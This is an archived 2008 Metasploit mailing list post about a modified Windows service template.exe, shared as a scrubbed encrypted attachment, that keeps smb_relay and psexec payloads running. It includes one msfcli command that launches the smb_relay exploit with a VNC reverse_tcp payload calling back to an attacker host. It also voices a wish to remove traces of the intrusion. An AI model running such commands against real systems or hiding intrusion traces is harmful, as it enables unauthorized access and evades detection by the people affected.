Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

NTLM relay implemented in Metasploit 3?

From: sigtrap at sigtrap.org (sigtrap)
Date: Thu, 07 Feb 2008 10:24:11 +0100
Hi,
I have posted a service template.exe to this list before.
I'll post it again because it works as a charm when you look 
for "Wireless Zero Configuration" hosts.
The password is 31 characters. Not 8 :-)
Here is my old post:

----------------------------
I now have a new "service template.exe". I managed to steal 10 minutes 
from my friend Magnus Br?ding, in which he threw together a service 
executable template PoC (yes, we're sorry it's bloated :-)) It's 
attached with the password:
"password" (without the quotes)

Got it? ;-)

If you backup the original template.exe and use this instead, the 
exploits psexec and smb_relay will work as intended (other exploits, 
that don't expect a service exe, probably won't work).

Eg:
./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7
PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E

The service is created and starts.
The payload is executed in a new thread.
The service controller *doesn't* kill the process after 30 seconds 
anymore, as it does with the normal template.exe.
When you terminate the vncclient the payload terminates the process 
through the "EXITFUNC=process".
The Windows service MMC snap-in will now report the created service 
as "stopped".

If we could now just make the handler (i.e. the one that that starts the 
VNC client on the attacking computer) report back to the exploit when 
the payload on the victim computer has ended (and thus its process has 
also terminated in this case), it would be easy to remove the service 
and executable on the victim computer, thereby leaving no bigger trace 
behind of the intrusion. I don't know how to do this, but it would be 
really great if someone did.
------------------

Regards
//Sigtrap


-----Original Message-----
From: H D Moore <hdm at metasploit.com>


The three big missing features:



3) A services wrapper around the EXE that prevents it from being killed
after ~30 seconds. 



-HD

-------------- next part --------------
A non-text attachment was scrubbed...
Name: template.exe.bin.pgp
Type: application/octet-stream
Size: 224107 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080207/c3ddea9c/attachment.obj>
Previous By Date Next
Previous By Thread Next

Current thread: